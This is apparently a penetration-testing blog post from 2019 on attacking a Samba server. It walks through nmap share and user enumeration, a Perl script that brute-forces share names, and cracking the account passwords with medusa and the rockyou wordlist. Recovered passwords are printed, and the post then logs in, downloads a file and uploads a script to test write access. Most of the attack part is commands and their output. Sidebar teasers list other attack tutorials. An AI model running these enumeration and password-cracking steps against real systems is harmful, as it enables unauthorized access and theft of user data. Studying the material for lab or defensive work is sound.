Tuesday, September 24, 2019

Interrogating Samba Servers

Finding open smb shares with NMAP

NMAP allows us to probe for possible open smb shares using its scripting engine. 

root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.00013s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: username
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
root@asus:~/unix%

NMAP reports two shares open using the username 'username'. next we will do it manually and see what results we get from the smbclient.

Listing remote shares

root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Sharename       Type      Comment
 ---------       ----      -------
 homes           Disk      Home Directories
 IPC$            IPC       IPC Service (asus server (Samba, Ubuntu))
 print$          Disk      Printer Drivers
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Server               Comment
 ---------            -------
 ASUS                 asus server (Samba, Ubuntu)

 Workgroup            Master
 ---------            -------
 WORKGROUP            ASUS
root@asus:~/pentest_notes%

If we try to connect to the 'homes' share we get this result. 

root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@asus:~/pentest_notes%

We get an error saying `BAD NETWORK NAME`, but in the comment section it says `home directories` which we will assume means users home directories. Our next step will be to try and figure out what the usernames are for the share names.

Enumerating Samba users with NMAP

In order to enumerate the possible users on the system we can issue an nmap command running the script 'smb-enum-users' and see if we get lucky. 

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

As you can see we found the users on the remote system. our next step is to verify the shares exist.

Enumerating possible shares via brute force

If we do not know any of the names of the shares in Home Directories, we need to use a Dictonary attack to uncover some common share names against the remote machine. For this we can write a small perl script using the smbclient tool to check if a shares exists. We will use a list of common first names as our payload. 

#!/usr/bin/env perl
use strict;
use warnings;
## 
## Dictonary attack against Samba server using smbclient
## try to unconver common user shares
##

my $host = "48.21.33.124";
my $filename = "common-names.txt";
open(my $fh, '<', $filename) or die $!;

while (my $word = <$fh>) {
    chomp($word);
    
    ## Try to login with a username and no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );

    ## ACCESS_DENIED means the share exists
    ## BAD_NETW_NAME means the share does not exist
    if ($result =~ /NT_STATUS_ACCESS_DENIED/g ) {
        print "[+] Share Found @ //$host/$word\n";
        next;
    }
}

root@asus:~/pentest_notes% ./smbclient-share-brute.pl 
[+] Share Found @ //48.21.33.124/clare
[+] Share Found @ //48.21.33.124/hayden
[+] Share Found @ //48.21.33.124/jared
[+] Share Found @ //48.21.33.124/sam
[+] Share Found @ //48.21.33.124/sasha
[+] Share Found @ //48.21.33.124/vance
root@asus:~/pentest_notes%

As you can see we found some valid shares on the remote machine we can try to connect to. But first we need to check if these shares require a password or allow us to browse anonymously. We can issue the following command to check if authentication is needed for the share in question. 

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N
Enter hayden's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
root@asus:~/pentest_notes%

The account does not allow anonymous browsing by using a blank password

Cracking share passwords

Once we found some valid share names we can try and crack the passwords associated with the accounts to gain access. For this we will use the tool 'medusa' and the rockyou wordlist as our payload. 

root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)]
root@asus:~%

As you can see we found some valid logins we can test. Our next step is to login with the supplied creditendtials and try to browse the shares.

Browsing Shares

Now that we have valid login and passwords for some of the users on the remote machine we can now try and access the shares. SMB has a client which is similar to ftp and nfs which is easy to use. 

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden
Enter hayden's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \>

This is what a successful login looks like. Lets now type the 'help' command to see all the commands avaiable to us in this session. 

smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            dir            du             
echo           exit           get            getfacl        geteas         
hardlink       help           history        iosize         lcd            
link           lock           lowercase      ls             l              
mask           md             mget           mkdir          more           
mput           newer          notify         open           posix          
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink   
print          prompt         put            pwd            q              
queue          quit           readlink       rd             recurse        
reget          rename         reput          rm             rmdir          
showacls       setea          setmode        scopy          stat           
symlink        tar            tarmode        timeout        translate      
unlock         volume         vuid           wdel           logon          
listconnect    showconnect    tcon           tdis           tid            
logoff         ..             !              
smb: \>

As you can see the interface is similar to that of the ftp client, so our next step is to see if we can list the directory contents of the share. 

smb: \> ls
  .                                   D        0  Wed May 15 07:45:17 2019
  ..                                  D        0  Sat Apr 27 16:58:49 2019
  .Xdefaults                          H     1600  Sat Apr 27 16:58:15 2019
  .kodi                              DH        0  Sat Apr 27 16:58:15 2019
  .profile                            H      655  Sat Apr 27 16:58:15 2019
  .bashrc                             H     3771  Sat Apr 27 16:58:15 2019
  .xscreensaver                       H     7953  Sat Apr 27 16:58:15 2019
  .bash_logout                        H      220  Sat Apr 27 16:58:15 2019
  .local                             DH        0  Sat Apr 27 16:58:15 2019
  ftp                                DR        0  Wed May 15 07:49:46 2019
  mail                                D        0  Wed May  1 09:44:03 2019
  .mozilla                           DH        0  Sat Apr 27 16:58:15 2019
  .config                            DH        0  Sat Apr 27 16:58:15 2019

  15013808 blocks of size 1024. 2057708 blocks available
smb: \>

Lets try to get a file from the remote share. 

smb: \> get .profile
getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec)
smb: \>

Lets try and see if we have write access to the remote share 

smb: \> put server.pl
putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s)
smb: \>

Changing directories is easy

smb: \> cd ftp
smb: \ftp\> ls
  .                                  DR        0  Wed May 15 07:49:46 2019
  ..                                  D        0  Mon Sep  2 14:54:37 2019
  fo                                  D        0  Wed May 15 07:49:41 2019
  files                               D        0  Wed May 15 07:49:46 2019

  15013808 blocks of size 1024. 2063700 blocks available
smb: \ftp\>
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...